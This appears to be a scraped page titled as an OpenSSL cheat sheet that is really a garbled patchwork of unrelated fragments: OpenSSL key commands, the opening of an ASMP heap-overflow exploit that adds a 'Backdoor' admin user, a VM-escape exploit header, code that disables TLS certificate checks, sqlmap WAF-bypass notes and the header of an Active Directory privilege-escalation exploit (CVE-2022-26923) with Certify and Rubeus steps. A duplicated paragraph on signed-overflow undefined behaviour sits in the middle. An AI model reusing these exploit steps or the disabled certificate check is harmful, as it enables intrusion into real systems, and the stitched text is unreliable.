# OpenSSL cheat sheet

This is a brief how-to for socket programmers.
Example: generate a 1024-bit RSA key pair (1024-bit RSA is shown only because the commands below use it; it is below the currently recommended minimum of 2048 bits):
$> openssl genrsa -out myprivate.pem 1024
$> openssl rsa -in myprivate.pem -pubout -out mypublic.pem| import socket, struct, sys | |
# Big-endian (network byte order) packing helpers.
# p32 packs an unsigned 32-bit value; p16 and p8 use the SIGNED ">h" / ">b"
# struct formats, so they raise struct.error for values outside the signed range.
def p32(x):
    """Pack x as a big-endian unsigned 32-bit integer."""
    return struct.pack(">I", x)


def p16(x):
    """Pack x as a big-endian signed 16-bit integer."""
    return struct.pack(">h", x)


def p8(x):
    """Pack x as a signed 8-bit integer."""
    return struct.pack(">b", x)
| # ASMP heap overflow exploit creates new applianceAdmin user | |
| def exploit(hostname, username="Backdoor", password="Backdoor"): | |
| global socks # python closes out of scope sockets | |
| port = 3211 # port is hardcoded in the binary | |
| usernm = username.encode() |
| #!/usr/bin/env python | |
| # https://www.reddit.com/r/netsec/comments/4a93eo/analysis_of_vm_escape_by_using_lua_script/d0zcsgl | |
| import sys | |
| import time | |
| import getopt | |
| import socket | |
| ''' | |
| Gives the hexadecimal representation of "command" |
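#!/bin/bash
# Lists files under ./ whose dynamic symbol table (objdump -T) references
# SYMBOL_NAME; each matching symbol line is prefixed with the file path.
# The path is passed to sh as a positional argument ($1) instead of being
# spliced into the -c script text or used as a printf format string, so a
# file name containing quotes, '$', backticks or '%' is treated as data
# rather than as shell code or a format directive.
SYMBOL_NAME="system"
find ./ -type f -exec sh -c '
  printf "%s: " "$1"
  objdump -T "$1" 2>&1 | grep -e " $2"
  echo ""
' sh {} "$SYMBOL_NAME" \; | grep -e " $SYMBOL_NAME"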
| #!/usr/bin/python -u | |
| from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty | |
| from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW | |
| from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter | |
# Install exchangelib's NoVerifyHTTPAdapter as the adapter class for every EWS
# protocol connection. That adapter skips TLS certificate verification, so the
# server's identity is never checked and the session can be intercepted.
# NOTE(review): only acceptable against a lab server with a self-signed
# certificate; otherwise keep the default adapter or trust the specific CA.
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter
import urllib3
# Silence the InsecureRequestWarning urllib3 would otherwise emit for each
# unverified HTTPS request; this hides the symptom, it does not reduce the risk.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
Why do compilers even bother exploiting the undefinedness of signed overflow? And what are those
mysterious cases where it helps?
A lot of people (myself included) are against transforms that aggressively exploit undefined behavior, but
I think it's useful to know what compiler writers are accomplishing by this.
TL;DR: C doesn't work very well if int != register width, but (for backward compatibility) int is 32-bit on all
major 64-bit targets, and this causes quite hairy problems for code generation and optimization in some
fairly common cases. The signed-overflow UB exploitation is an attempt to work around this.
Why do compilers even bother exploiting the undefinedness of signed overflow? And what are those
mysterious cases where it helps?
A lot of people (myself included) are against transforms that aggressively exploit undefined behavior, but
I think it's useful to know what compiler writers are accomplishing by this.
TL;DR: C doesn't work very well if int != register width, but (for backward compatibility) int is 32-bit on all
major 64-bit targets, and this causes quite hairy problems for code generation and optimization in some
fairly common cases. The signed-overflow UB exploitation is an attempt to work around this.
The table below shows the results of tests launched against an F5 BIG-IP ASM WAF appliance in its XX version of YY and ZZ version of XY.
The names below are to be passed to the --tamper= parameter of sqlmap.
The "Violation Rating" column is the most dominant rating among the top 20 requests observed by F5 in its Security >> Event Logs : Application : Requests view.
The scale is 0-5.
| // Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923) | |
| // Author: @domchell - MDSec | |
// This exploit can be used to update the relevant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
| // Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :) | |
| // Steps: | |
| // 1. Escalate on any workstation (hint: krbrelayup ftw) | |
| // 2. Execute UpdateMachineAccount.exe as SYSTEM | |
| // 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp | |
| // 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256) |